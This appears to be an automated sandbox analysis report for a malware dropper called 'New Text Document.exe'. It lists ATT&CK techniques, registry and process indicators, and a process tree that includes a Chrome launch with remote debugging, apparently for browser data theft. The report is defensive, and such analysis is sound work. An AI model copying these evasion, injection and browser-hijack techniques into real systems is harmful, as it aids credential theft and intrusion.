Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	StCl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cHSzTDjVl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svc1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pure.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jrirkfiweid.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bin2Srv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	giania.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lem.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dw20.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	olddataeraser19.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WindowsServices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fusca%20game.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	LinkedinTuVanDat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	silk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wermgr.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 22 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
460	PING.EXE
5144	PING.EXE
7444	PING.EXE
1292	PING.EXE
7768	PING.EXE
6432	PING.EXE
4100	PING.EXE
7800	PING.EXE
2344	MicrosoftEdgeUpdate.exe
6344	PING.EXE
1720	PING.EXE
6956	PING.EXE
3264	PING.EXE
5548	MicrosoftEdgeUpdate.exe
736	MicrosoftEdgeUpdate.exe
6756	PING.EXE
7956	PING.EXE
7812	PING.EXE
6556	PING.EXE
7628	PING.EXE
8336	PING.EXE
6752	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4920	netsh.exe
5828	cmd.exe

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral1/files/0x001700000002b2b8-2212.dat	nsis_installer_1
behavioral1/files/0x001700000002b2b8-2212.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	client2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	client2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	client2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	BitLockerToGo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	dw20.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	dw20.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	BitLockerToGo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Bjkm5hE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dw20.exe

Delays execution with timeout.exe 5 IoCs

defense_evasion

pid	Process
5412	timeout.exe
2996	timeout.exe
2992	timeout.exe
2660	timeout.exe
3596	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5668	WMIC.exe

Discovers systems in the same network 1 TTPs 2 IoCs

discovery

Remote System Discovery

T1018

pid	Process
5556	net.exe
8128	net.exe

Enumerates system info in registry 2 TTPs 10 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dw20.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1572	NETSTAT.EXE
2824	ipconfig.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5208	systeminfo.exe

Kills process with taskkill 6 IoCs

defense_evasion

pid	Process
4608	taskkill.exe
5536	taskkill.exe
5496	taskkill.exe
5396	taskkill.exe
5632	taskkill.exe
2620	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133835925495733516"	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2420732851-834218046-3184189440-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.WindowsTerminal_8wekyb3d8bbwe\StartTerminalOnLoginTask	taskmgr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE

Runs net.exe

Runs ping.exe 1 TTPs 19 IoCs

Remote System Discovery

T1018

pid	Process
6956	PING.EXE
7444	PING.EXE
6432	PING.EXE
6556	PING.EXE
7628	PING.EXE
4100	PING.EXE
6344	PING.EXE
1292	PING.EXE
3264	PING.EXE
8336	PING.EXE
460	PING.EXE
6756	PING.EXE
7812	PING.EXE
1720	PING.EXE
7800	PING.EXE
7768	PING.EXE
6752	PING.EXE
5144	PING.EXE
7956	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5972	schtasks.exe
5280	schtasks.exe
7872	schtasks.exe
388	schtasks.exe
5920	schtasks.exe
3024	schtasks.exe
2496	schtasks.exe
4956	schtasks.exe
5580	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
2260	untitled2.exe
2260	untitled2.exe
3772	StCl.exe
3772	StCl.exe
3772	StCl.exe
3772	StCl.exe
3960	taskmgr.exe
5844	random.exe
5844	random.exe
3960	taskmgr.exe
5692	Bjkm5hE.exe
5692	Bjkm5hE.exe
3960	taskmgr.exe
3960	taskmgr.exe
5844	random.exe
5844	random.exe
5592	silk.tmp
5592	silk.tmp
3960	taskmgr.exe
5844	random.exe
5844	random.exe
5844	random.exe
5844	random.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3180	z.exe
3180	z.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
5692	Bjkm5hE.exe
5692	Bjkm5hE.exe
3960	taskmgr.exe
3960	taskmgr.exe
5692	Bjkm5hE.exe
5692	Bjkm5hE.exe
4284	chrome.exe
4284	chrome.exe
3960	taskmgr.exe
3960	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
5164	savedecrypter.exe
1908	server.exe
3320	Explorer.EXE

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
5308	cann.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
6864	chrome.exe
6864	chrome.exe
6864	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3524	New Text Document.exe
Token: SeDebugPrivilege	3960	taskmgr.exe
Token: SeSystemProfilePrivilege	3960	taskmgr.exe
Token: SeCreateGlobalPrivilege	3960	taskmgr.exe
Token: SeDebugPrivilege	3772	StCl.exe
Token: SeDebugPrivilege	2260	untitled2.exe
Token: SeDebugPrivilege	5536	taskkill.exe
Token: SeDebugPrivilege	5496	taskkill.exe
Token: SeDebugPrivilege	5396	taskkill.exe
Token: SeDebugPrivilege	5632	taskkill.exe
Token: SeImpersonatePrivilege	5844	random.exe
Token: SeDebugPrivilege	2620	taskkill.exe
Token: SeDebugPrivilege	1856	Discord.exe
Token: SeShutdownPrivilege	3320	Explorer.EXE
Token: SeCreatePagefilePrivilege	3320	Explorer.EXE
Token: SeShutdownPrivilege	3320	Explorer.EXE
Token: SeCreatePagefilePrivilege	3320	Explorer.EXE
Token: SeShutdownPrivilege	3320	Explorer.EXE
Token: SeCreatePagefilePrivilege	3320	Explorer.EXE
Token: SeShutdownPrivilege	3320	Explorer.EXE
Token: SeCreatePagefilePrivilege	3320	Explorer.EXE
Token: SeShutdownPrivilege	3320	Explorer.EXE
Token: SeCreatePagefilePrivilege	3320	Explorer.EXE
Token: SeShutdownPrivilege	3320	Explorer.EXE
Token: SeCreatePagefilePrivilege	3320	Explorer.EXE
Token: SeShutdownPrivilege	3320	Explorer.EXE
Token: SeCreatePagefilePrivilege	3320	Explorer.EXE
Token: SeDebugPrivilege	4608	taskkill.exe
Token: SeShutdownPrivilege	3320	Explorer.EXE
Token: SeCreatePagefilePrivilege	3320	Explorer.EXE
Token: SeShutdownPrivilege	3320	Explorer.EXE
Token: SeCreatePagefilePrivilege	3320	Explorer.EXE
Token: SeShutdownPrivilege	3320	Explorer.EXE
Token: SeCreatePagefilePrivilege	3320	Explorer.EXE
Token: SeShutdownPrivilege	3320	Explorer.EXE
Token: SeCreatePagefilePrivilege	3320	Explorer.EXE
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	3320	Explorer.EXE
Token: SeCreatePagefilePrivilege	3320	Explorer.EXE
Token: SeShutdownPrivilege	3320	Explorer.EXE
Token: SeCreatePagefilePrivilege	3320	Explorer.EXE
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeDebugPrivilege	5164	savedecrypter.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	3320	Explorer.EXE
Token: SeCreatePagefilePrivilege	3320	Explorer.EXE
Token: SeShutdownPrivilege	5672	powercfg.exe
Token: SeCreatePagefilePrivilege	5672	powercfg.exe
Token: SeShutdownPrivilege	3320	Explorer.EXE
Token: SeCreatePagefilePrivilege	3320	Explorer.EXE
Token: SeShutdownPrivilege	5500	powercfg.exe
Token: SeCreatePagefilePrivilege	5500	powercfg.exe
Token: SeShutdownPrivilege	3320	Explorer.EXE

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
5592	silk.tmp
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
5308	cann.exe
5308	cann.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe
3960	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
7220	GRAW.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3320	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3524 wrote to memory of 2744	3524	New Text Document.exe	96
PID 3524 wrote to memory of 2744	3524	New Text Document.exe	96
PID 3524 wrote to memory of 2744	3524	New Text Document.exe	96
PID 3524 wrote to memory of 3772	3524	New Text Document.exe	98
PID 3524 wrote to memory of 3772	3524	New Text Document.exe	98
PID 3524 wrote to memory of 3772	3524	New Text Document.exe	98
PID 3524 wrote to memory of 2260	3524	New Text Document.exe	99
PID 3524 wrote to memory of 2260	3524	New Text Document.exe	99
PID 2260 wrote to memory of 5536	2260	untitled2.exe	101
PID 2260 wrote to memory of 5536	2260	untitled2.exe	101
PID 2260 wrote to memory of 5496	2260	untitled2.exe	103
PID 2260 wrote to memory of 5496	2260	untitled2.exe	103
PID 3524 wrote to memory of 5844	3524	New Text Document.exe	104
PID 3524 wrote to memory of 5844	3524	New Text Document.exe	104
PID 3524 wrote to memory of 5844	3524	New Text Document.exe	104
PID 2260 wrote to memory of 5396	2260	untitled2.exe	105
PID 2260 wrote to memory of 5396	2260	untitled2.exe	105
PID 2260 wrote to memory of 5632	2260	untitled2.exe	106
PID 2260 wrote to memory of 5632	2260	untitled2.exe	106
PID 3524 wrote to memory of 5692	3524	New Text Document.exe	107
PID 3524 wrote to memory of 5692	3524	New Text Document.exe	107
PID 3524 wrote to memory of 5692	3524	New Text Document.exe	107
PID 3524 wrote to memory of 3956	3524	New Text Document.exe	108
PID 3524 wrote to memory of 3956	3524	New Text Document.exe	108
PID 3524 wrote to memory of 3956	3524	New Text Document.exe	108
PID 3956 wrote to memory of 5592	3956	silk.exe	109
PID 3956 wrote to memory of 5592	3956	silk.exe	109
PID 3956 wrote to memory of 5592	3956	silk.exe	109
PID 5592 wrote to memory of 3720	5592	silk.tmp	110
PID 5592 wrote to memory of 3720	5592	silk.tmp	110
PID 5592 wrote to memory of 3720	5592	silk.tmp	110
PID 3524 wrote to memory of 5140	3524	New Text Document.exe	111
PID 3524 wrote to memory of 5140	3524	New Text Document.exe	111
PID 3524 wrote to memory of 5140	3524	New Text Document.exe	111
PID 5140 wrote to memory of 5724	5140	IMG001.exe	112
PID 5140 wrote to memory of 5724	5140	IMG001.exe	112
PID 5140 wrote to memory of 5724	5140	IMG001.exe	112
PID 5724 wrote to memory of 2620	5724	cmd.exe	114
PID 5724 wrote to memory of 2620	5724	cmd.exe	114
PID 5724 wrote to memory of 2620	5724	cmd.exe	114
PID 5140 wrote to memory of 5824	5140	IMG001.exe	117
PID 5140 wrote to memory of 5824	5140	IMG001.exe	117
PID 5140 wrote to memory of 5824	5140	IMG001.exe	117
PID 3524 wrote to memory of 3180	3524	New Text Document.exe	118
PID 3524 wrote to memory of 3180	3524	New Text Document.exe	118
PID 3180 wrote to memory of 3320	3180	z.exe	53
PID 3524 wrote to memory of 4884	3524	New Text Document.exe	119
PID 3524 wrote to memory of 4884	3524	New Text Document.exe	119
PID 4884 wrote to memory of 1856	4884	steam.exe	120
PID 4884 wrote to memory of 1856	4884	steam.exe	120
PID 4884 wrote to memory of 4280	4884	steam.exe	121
PID 4884 wrote to memory of 4280	4884	steam.exe	121
PID 5140 wrote to memory of 1528	5140	IMG001.exe	125
PID 5140 wrote to memory of 1528	5140	IMG001.exe	125
PID 5140 wrote to memory of 1528	5140	IMG001.exe	125
PID 3524 wrote to memory of 6076	3524	New Text Document.exe	126
PID 3524 wrote to memory of 6076	3524	New Text Document.exe	126
PID 1528 wrote to memory of 3584	1528	IMG001.exe	127
PID 1528 wrote to memory of 3584	1528	IMG001.exe	127
PID 1528 wrote to memory of 3584	1528	IMG001.exe	127
PID 6076 wrote to memory of 6104	6076	bitcoin3000.exe	129
PID 6076 wrote to memory of 6104	6076	bitcoin3000.exe	129
PID 3584 wrote to memory of 4608	3584	cmd.exe	131
PID 3584 wrote to memory of 4608	3584	cmd.exe	131

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
6932	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Downloads MZ/PE file
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3320
- C:\Users\Admin\AppData\Local\Temp\New Text Document.exe
  "C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"
  2⤵
  - Downloads MZ/PE file
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3524
- - C:\Users\Admin\AppData\Local\Temp\a\lem.exe
    "C:\Users\Admin\AppData\Local\Temp\a\lem.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2744
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      PID:6012
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Drops file in Windows directory
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:6864
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0x88,0x108,0x7fffda71cc40,0x7fffda71cc4c,0x7fffda71cc58
        6⤵
        
        PID:6904
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1824,i,15629971779607784014,12583318137926845863,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=1820 /prefetch:2
        6⤵
        
        PID:6936
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2092,i,15629971779607784014,12583318137926845863,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2104 /prefetch:3
        6⤵
        Blocklisted process makes network request
        
        PID:1496
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2168,i,15629971779607784014,12583318137926845863,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2184 /prefetch:8
        6⤵
        
        PID:228
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3064,i,15629971779607784014,12583318137926845863,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3076 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:7284
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,15629971779607784014,12583318137926845863,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3108 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:7336
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4372,i,15629971779607784014,12583318137926845863,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4516 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:6396
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4200,i,15629971779607784014,12583318137926845863,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4244 /prefetch:8
        6⤵
        
        PID:3552
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4212,i,15629971779607784014,12583318137926845863,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4672 /prefetch:8
        6⤵
        
        PID:1588
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
